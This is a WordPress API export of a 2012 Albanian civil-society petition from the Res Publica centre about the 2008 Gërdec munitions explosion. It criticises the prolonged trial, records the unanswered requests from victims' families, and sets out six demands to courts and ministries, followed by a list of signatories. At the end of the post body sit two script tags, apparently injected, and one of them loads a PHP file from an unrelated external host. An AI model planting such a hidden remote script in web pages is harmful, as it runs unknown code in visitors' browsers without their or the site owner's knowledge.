{"id":533,"date":"2012-03-15T16:07:17","date_gmt":"2012-03-15T14:07:17","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=533"},"modified":"2013-10-02T16:10:15","modified_gmt":"2013-10-02T14:10:15","slug":"peticion-i-shoqerise-civile-drejtesi-per-tragjedine-e-gerdecit","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=533","title":{"rendered":"Peticion i Shoq\u00ebris\u00eb Civile \u2013 Drejt\u00ebsi p\u00ebr Tragjedin\u00eb e G\u00ebrdecit"},"content":{"rendered":"<p align=\"right\"><strong>Peticion i Shoq\u00ebris\u00eb Civile \u2013 Drejt\u00ebsi p\u00ebr Tragjedin\u00eb e G\u00ebrdecit<\/strong><\/p>\n<p>Shp\u00ebrthimi i fabrik\u00ebs s\u00eb demontimit t\u00eb municioneve n\u00eb G\u00ebrdec n\u00eb 15 mars 2008, shkaktoi vdekjen e 26 personave, mes tyre 2 f\u00ebmij\u00eb, plagosjen e mbi 300 qytetar\u00ebve t\u00eb tjer\u00eb, si dhe shkat\u00ebrrimin dhe d\u00ebmtimin e mbi kat\u00ebr mij\u00eb objekteve t\u00eb zon\u00ebs.<\/p>\n<p>Kan\u00eb kaluar 4 vjet dhe drejt\u00ebsia \u00ebsht\u00eb munguesi m\u00eb i madh i k\u00ebtij procesi. Nga 30 t\u00eb akuzuarit si p\u00ebrgjegj\u00ebs p\u00ebr humbjen e 26 jet\u00ebve, mbi 300 plagosjeve, dhe d\u00ebmeve t\u00eb tjera materiale:<\/p>\n<ul>\n<li>1 prej tyre mbetet ende i pagjykuar dhe i mbrojtur nga imuniteti parlamentar;<\/li>\n<li>10 jan\u00eb shpallur t\u00eb pafajsh\u00ebm;<\/li>\n<li>4 t\u00eb akuzuar p\u00ebr vrasje nuk jan\u00eb d\u00ebnuar p\u00ebr k\u00ebt\u00eb akuz\u00eb, por kan\u00eb marr\u00eb nga 10-18 vjet d\u00ebnim me burgim p\u00ebr vepra penale t\u00eb tjera si \u201cshkat\u00ebrrim prone nga pakujdesia\u201d apo \u201cshkelje t\u00eb rregullave t\u00eb mbrojtjes n\u00eb pun\u00eb\u201d.<\/li>\n<\/ul>\n<p>Qartazi, vendimi i Gjykat\u00ebs s\u00eb Tiran\u00ebs i dat\u00ebs 12 mars 2012 nuk i p\u00ebrgjigjet shkall\u00ebs s\u00eb tragjedis\u00eb dhe p\u00ebrgjegj\u00ebsive p\u00ebr G\u00ebrdecin dhe l\u00eb pa autor\u00eb vrasjet q\u00eb shkaktuan vdekjen e 26 viktimave t\u00eb pafajshme. Vendimi nuk dha drejt\u00ebsi, por u karakterizua nga nj\u00eb proces gjyq\u00ebsor i padrejt\u00eb dhe deficitar. Konkretisht:<\/p>\n<ul>\n<li>Procesi penal sh\u00ebnoi nj\u00eb rekord seancash gjyq\u00ebsore (211 seanca) n\u00eb harkun kohor t\u00eb thuajse 3 viteve, af\u00ebrsisht tre her\u00eb m\u00eb shum\u00eb se mesatarja e proceseve t\u00eb tjera t\u00eb ngjashme. 53% e seancave (112\/211 seanca) d\u00ebshtuan p\u00ebr munges\u00eb t\u00eb avokat\u00ebve dhe mosformim t\u00eb trupit gjykues. Drejt\u00ebsia e vonuar \u00ebsht\u00eb drejt\u00ebsi e mohuar.<\/li>\n<\/ul>\n<ul>\n<li>Pavar\u00ebsisht d\u00ebmeve t\u00eb m\u00ebdha materiale, familjar\u00ebt e viktimave k\u00ebrkuan d\u00ebmshp\u00ebrblim vet\u00ebm t\u00eb jet\u00ebve t\u00eb humbura dhe ngrit\u00ebn sipas t\u00eb gjitha rregullave padin\u00eb e tyre civile n\u00eb procesin penal. Gjyqtar\u00ebt vendos\u00ebn t\u00eb ve\u00e7onin padin\u00eb civile nga procesi penal pa d\u00ebgjuar z\u00ebrin e vet\u00eb t\u00eb d\u00ebmtuarve. Me justifikimin se padia civile zvarrit procesin, Gjykata e Lart\u00eb shp\u00ebrfilli padin\u00eb civile nd\u00ebrkoh\u00eb q\u00eb shum\u00eb prej viktimave lan\u00eb pas f\u00ebmij\u00eb t\u00eb mitur dhe pa asnj\u00eb p\u00ebrkrahje. Procesi penal gjithsesi u zvarrit: 211 seanca n\u00eb 3 vjet.<\/li>\n<\/ul>\n<ul>\n<li>N\u00eb p\u00ebrputhje me nenin 342 t\u00eb Kodit t\u00eb Procedur\u00ebs Penale, familjar\u00ebt e viktimave k\u00ebrkuan q\u00eb gjykata t\u00eb zbatonte ligjin dhe t\u00eb zhvillonte seanca n\u00eb \u00e7do dit\u00eb pune dhe jo vet\u00ebm dy her\u00eb n\u00eb jav\u00eb. Pas presionit t\u00eb vazhduesh\u00ebm publik dhe nd\u00ebrkomb\u00ebtar, gjykata e shtoi vet\u00ebm me 1 dit\u00eb m\u00eb shum\u00eb n\u00eb jav\u00eb zhvillimin e seancave gjyq\u00ebsore.<\/li>\n<\/ul>\n<ul>\n<li>Prokuroria e P\u00ebrgjithshme fillimisht u mohoi familjar\u00ebve t\u00eb viktimave t\u00eb drejt\u00ebn p\u00ebr t\u2019u informuar lidhur me hetimet, duke iu p\u00ebrgjigjur k\u00ebrkesave t\u00eb p\u00ebrs\u00ebritura t\u00eb familjar\u00ebve t\u00eb viktimave vet\u00ebm 14 muaj pas tragjedis\u00eb, pasi u p\u00ebrball e u detyrua nga gjykata.<\/li>\n<\/ul>\n<p>P\u00ebr 3 vjet rresht, familjar\u00ebt e viktimave k\u00ebrkuan vazhdimisht nj\u00eb kopje t\u00eb provave shkresore t\u00eb disponuara nga vet\u00eb Gjykata e Tiran\u00ebs dhe nga Gjykata e Lart\u00eb, p\u00ebr t\u00eb mb\u00ebshtetur pretendimet e tyre para gjykat\u00ebs. Asnj\u00eb prej k\u00ebrkesave (4 k\u00ebrkesa me shkrim) nuk mori qoft\u00eb dhe nj\u00eb p\u00ebrgjigje zyrtare.<\/p>\n<p>T\u00eb nj\u00ebjtin fat pat\u00ebn edhe 10 k\u00ebrkesat e tjera p\u00ebr informacion drejtuar Ministris\u00eb s\u00eb Mbrojtjes, Ministris\u00eb s\u00eb Pun\u00ebs, Ministris\u00eb s\u00eb Sh\u00ebndet\u00ebsis\u00eb, QSUT N\u00ebn\u00eb Tereza, Bashkis\u00eb Vor\u00eb, Uzin\u00ebs s\u00eb Poli\u00e7anit, Drejtoris\u00eb s\u00eb Mbrojtjes nga Zjarri, etj. N\u00eb ato 5 raste kur \u00ebsht\u00eb dh\u00ebn\u00eb p\u00ebrgjigje, k\u00ebto kan\u00eb q\u00ebn\u00eb gjysmake dhe t\u00eb pashoq\u00ebruara me dokumentacionin autentik si\u00e7 e k\u00ebrkon ligji.<\/p>\n<p>Familjar\u00ebt e viktimave i kan\u00eb k\u00ebrkuar Ministrit t\u00eb Drejt\u00ebsis\u00eb t\u00eb marr\u00eb masat e parashikuara nga ligji lidhur me p\u00ebrjashtimin nga taksat tep\u00ebr t\u00eb larta e t\u00eb pap\u00ebrballueshme t\u00eb vler\u00ebs s\u00eb padis\u00eb, t\u00eb cilat shkojn\u00eb me p\u00ebraf\u00ebrsi rreth 20.7 milion\u00eb lek\u00eb. Megjithat\u00eb, deri m\u00eb sot nuk \u00ebsht\u00eb marr\u00eb asnj\u00eb p\u00ebrgjigje. Barra e taks\u00ebs e b\u00ebn t\u00eb pamundur vijimin e procesit civil nga ana e familjar\u00ebve. Cenimi i t\u00eb drejt\u00ebs p\u00ebr nj\u00eb proces t\u00eb rregull ligjor p\u00ebr shkak t\u00eb mospagimit t\u00eb taks\u00ebs gjyq\u00ebsore \u00ebsht\u00eb nj\u00eb shkelje e cil\u00ebsuar si e papranueshme edhe nga Gjykata Europiane e t\u00eb Drejtave t\u00eb Njeriut.<\/p>\n<p>Familjar\u00ebt e viktimave kan\u00eb k\u00ebrkuar tre her\u00eb nisjen e procedur\u00ebs nga Prokuroria e P\u00ebrgjithshme p\u00ebr heqjen e imunitetit t\u00eb ish-Ministrit t\u00eb Mbrojtjes z. Fatmir Mediu. K\u00ebto k\u00ebrkesa kan\u00eb mbetur pa p\u00ebrgjigje.<\/p>\n<p>Dhjet\u00ebra t\u00eb plagosur i kan\u00eb k\u00ebrkuar Gjykat\u00ebs s\u00eb Lart\u00eb nisjen e nj\u00eb procesi gjyq\u00ebsor ndaj ish-Ministrit t\u00eb Mbrojtjes z. Mediu, por n\u00eb t\u00eb dyja rastet Gjykata e Lart\u00eb ka vendosur mosfillimin e procedimit penal. T\u00eb plagosurit i jan\u00eb drejtuar Gjykat\u00ebs Kushtetuese, e cila ka pranuar ta trajtoj\u00eb \u00e7\u00ebshtjen pa vones\u00eb, por nuk \u00ebsht\u00eb shprehur ende me nj\u00eb vendim p\u00ebr t\u00eb qart\u00ebsuar k\u00ebt\u00eb situat\u00eb.<\/p>\n<p>Familjar\u00ebt e viktimave i kna\u00eb k\u00ebrkuar Ministris\u00eb s\u00eb Mbrojtjes nxjerrjen e akteve p\u00ebrkat\u00ebse p\u00ebr d\u00ebmshp\u00ebrblimin e tyre, por kjo ministri ia ka deleguar p\u00ebrgjegj\u00ebsin\u00eb firm\u00ebs private Albademil, duke iu shmangur detyrimeve t\u00eb veta ligjore. K\u00ebshilli i Ministrave nuk ka kthyer asnj\u00ebher\u00eb p\u00ebrgjigje p\u00ebr ankimin administrativ n\u00eb fjal\u00eb t\u00eb familjar\u00ebve t\u00eb viktimave, duke shp\u00ebrfillur t\u00eb vrar\u00ebt nga veprimtaria shtet\u00ebrore e demontimit ushtarak.<\/p>\n<p>Padrejt\u00ebsia e hasur n\u00eb \u00e7do hap nga familjar\u00ebt e viktimave \u00ebsht\u00eb padrejt\u00ebsi n\u00eb kurriz t\u00eb \u00e7do qytetari shqiptar. Prandaj, n\u00ebnshkruesit e k\u00ebtij Peticioni shprehin nj\u00ebz\u00ebri solidaritetin e tyre me familjar\u00ebt e viktimave dhe t\u00eb plagosurit e G\u00ebrdecit; shprehin nj\u00ebz\u00ebri revoltimin e tyre qytetar ndaj maraton\u00ebs s\u00eb padrejt\u00ebsive t\u00eb G\u00ebrdecit, dhe u k\u00ebrkojn\u00eb nj\u00ebz\u00ebri institucioneve p\u00ebrkat\u00ebse t\u00eb tregohen n\u00eb lart\u00ebsin\u00eb e situat\u00ebs dhe t\u00eb p\u00ebrmbushin detyrat me t\u00eb cilat i ngarkon Kushtetuta dhe ligjet e k\u00ebtij vendi. Konkretisht:<\/p>\n<p><strong>1.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/strong><strong>Gjykata e Tiran\u00ebs t\u00eb zbardh\u00eb pa vones\u00eb vendimin e plot\u00eb me q\u00ebllim q\u00eb t\u00eb mund\u00ebsohet apelimi nga Prokuroria e P\u00ebrgjithshme brenda afatit ligjor prej 10 dit\u00ebsh.<\/strong><strong>\u00a0<\/strong><\/p>\n<p><strong>2.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/strong><strong>Prokuroria ta \u00e7oj\u00eb deri n\u00eb fund, n\u00eb p\u00ebrputhje me sa dikton ligji, k\u00ebt\u00eb pro\u00e7es q\u00eb p\u00ebrfshin interesat e t\u00eb gjith\u00ebve.<\/strong><\/p>\n<p><strong>3.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/strong><strong>Gjykata e Apelit Tiran\u00eb t\u00eb trajtoj\u00eb me precedenc\u00eb absolute ngjarjen e G\u00ebrdecit. N\u00eb vendimin e saj t\u00eb tregoj\u00eb seriozitetin dhe profesionalizmin e domosdosh\u00ebm n\u00eb trajtimin e \u00e7do k\u00ebrkese nga ana e institucionit t\u00eb Prokuroris\u00eb.<\/strong><\/p>\n<p><strong>\u00a0<\/strong><strong>4.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/strong><strong>K\u00ebshilli i Lart\u00eb i Drejt\u00ebsis\u00eb t\u00eb monitoroj\u00eb dhe t\u00eb vler\u00ebsoj\u00eb pun\u00ebn e deritanishme t\u00eb gjyqtar\u00ebve dhe t\u00eb nd\u00ebrhyj\u00eb p\u00ebr qart\u00ebsimin e pikave ende t\u00eb err\u00ebta t\u00eb k\u00ebtij procesi t\u00eb zgjatur tej mase.<\/strong><\/p>\n<p><strong>\u00a0<\/strong><strong>5.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/strong><strong>Institucionet shtet\u00ebrore t\u00eb lartp\u00ebrmendura t\u00eb trajtojn\u00eb pa vones\u00eb dhe n\u00eb p\u00ebrputhje t\u00eb plot\u00eb me sfer\u00ebn e kompetencave t\u00eb veta \u00e7do k\u00ebrkes\u00eb legjitime t\u00eb familjar\u00ebve t\u00eb viktimave t\u00eb G\u00ebrdecit.<\/strong><\/p>\n<p><strong>\u00a0<\/strong><strong>6.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<\/strong><strong>Ministri i Drejt\u00ebsis\u00eb n\u00eb bashk\u00ebpunim me Ministrin e Financave dhe Gjykat\u00ebn e Tiran\u00ebs t\u00eb marrin \u00e7do mas\u00eb t\u00eb nevojshme p\u00ebr t\u00eb p\u00ebrjashtuar familjar\u00ebt e viktimave t\u00eb G\u00ebrdecit nga detyrimi p\u00ebr pagimin e taks\u00ebs gjyq\u00ebsore, duke u garantuar k\u00ebshtu aksesin n\u00eb gjykat\u00eb dhe n\u00eb drejt\u00ebsi.<\/strong><\/p>\n<p>Shoq\u00ebria civile shqiptare e ndjen si detyrim t\u00eb sajin t\u00eb k\u00ebrkoj\u00eb vendosjen n\u00eb vend t\u00eb drejt\u00ebsis\u00eb. Tragjedia e G\u00ebrdecit \u00ebsht\u00eb testi m\u00eb i r\u00ebnd\u00ebsish\u00ebm p\u00ebr sa i p\u00ebrket mosfunksionimit t\u00eb shtetit ligjor dhe i rr\u00ebnj\u00ebve t\u00eb thella t\u00eb fenomenit t\u00eb pand\u00ebshkueshm\u00ebris\u00eb n\u00eb Shqip\u00ebri, dhe nj\u00ebkoh\u00ebsisht ai mund t\u00eb transformohet n\u00eb pik\u00ebnisjen p\u00ebr arritjen e nj\u00eb sistemi gjyq\u00ebsor t\u00eb besuesh\u00ebm e funksional, n\u00eb sh\u00ebrbim t\u00eb qytetarit e jo t\u00eb pushtetit. N\u00ebse ky pro\u00e7es d\u00ebshton, besimi tek drejt\u00ebsia dhe demokracia do t\u00eb jet\u00eb i pamundur p\u00ebr t\u2019u rekuperuar.<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<p><strong>N\u00ebnshkruesit e peticionit:<\/strong><\/p>\n<ol>\n<li>Shoqata e Familjar\u00ebve t\u00eb Viktimave t\u00eb Shp\u00ebrthimit, G\u00ebrdec<\/li>\n<li>Qendra Res Publica<\/li>\n<li>Fondacioni Shoq\u00ebria e Hapur p\u00ebr Shqip\u00ebrin\u00eb, Soros<\/li>\n<li>Qendra e Studimeve Parlamentare<\/li>\n<li>Komiteti Shqiptar i Helsinkit<\/li>\n<li>Instituti p\u00ebr Demokraci dhe Nd\u00ebrmjet\u00ebsim<\/li>\n<li>Qendra p\u00ebr Mbrojtjen e t\u00eb Drejtave t\u00eb F\u00ebmij\u00ebve n\u00eb Shqip\u00ebri, CRCA<\/li>\n<li>Instituti p\u00ebr Studime Publike dhe Ligjore<\/li>\n<li>Blendi Kajsiu, politolog<\/li>\n<li>Andrea Stefani, analist<\/li>\n<li>L\u00ebvizja Mjaft<\/li>\n<li>Ilir Yzeiri, publicist dhe pedagog<\/li>\n<li>Shoqata \u201cAsistenc\u00eb p\u00ebr Komunitetin n\u00eb Shqip\u00ebri\u201d<\/li>\n<li>Shoqata \u201cMisionar\u00ebt e t\u00eb Drejtave Sociale t\u00eb Ku\u00e7ov\u00ebs\u201d<\/li>\n<li>Art Kontakt<\/li>\n<li>Lavdosh F\u00ebrruni<\/li>\n<li>Instituti Antonio Gramshi<\/li>\n<li>Leart Kola, aktivist<\/li>\n<li>Arlind Qorri, pedagog i shkencave politike<\/li>\n<li>European Centre<\/li>\n<li>Qendra Komb\u00ebtare p\u00ebr Sh\u00ebrbime Komunitare<\/li>\n<li>Qendra p\u00ebr Studime t\u00eb Avancuara<\/li>\n<li>ARSIS \u2013 Organizat\u00eb Shoq\u00ebrore p\u00ebr P\u00ebrkrahjen e t\u00eb Rinjve<\/li>\n<li>Forumi i Mendimit t\u00eb Lir\u00eb<\/li>\n<li>Sindikata e Minator\u00ebve<\/li>\n<li>Transparency International Albania<\/li>\n<li>Tirana Legal Aid Society, TLAS<\/li>\n<li>Ervin \u00c7uli, dramaturg<\/li>\n<\/ol>\n<p><em>Peticioni \u00ebsht\u00eb ende i hapur. N\u00ebse do ti bashkangjitesh kontakto andi.kananaj@gmail.com<\/em><\/p>\n<p><em>P\u00ebr m\u00eb shum\u00eb informacion, lutemi konsultoni faqen e internetit t\u00eb Qendr\u00ebs Res Publica:<a href=\"http:\/\/www.respublicalb.com\/\">http:\/\/www.respublicalb.com<\/a><\/em><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Peticion i Shoq\u00ebris\u00eb Civile \u2013 Drejt\u00ebsi p\u00ebr Tragjedin\u00eb e G\u00ebrdecit Shp\u00ebrthimi i fabrik\u00ebs s\u00eb demontimit t\u00eb municioneve n\u00eb G\u00ebrdec n\u00eb [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":534,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/533"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=533"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/533\/revisions"}],"predecessor-version":[{"id":535,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/533\/revisions\/535"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/534"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=533"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=533"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=533"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}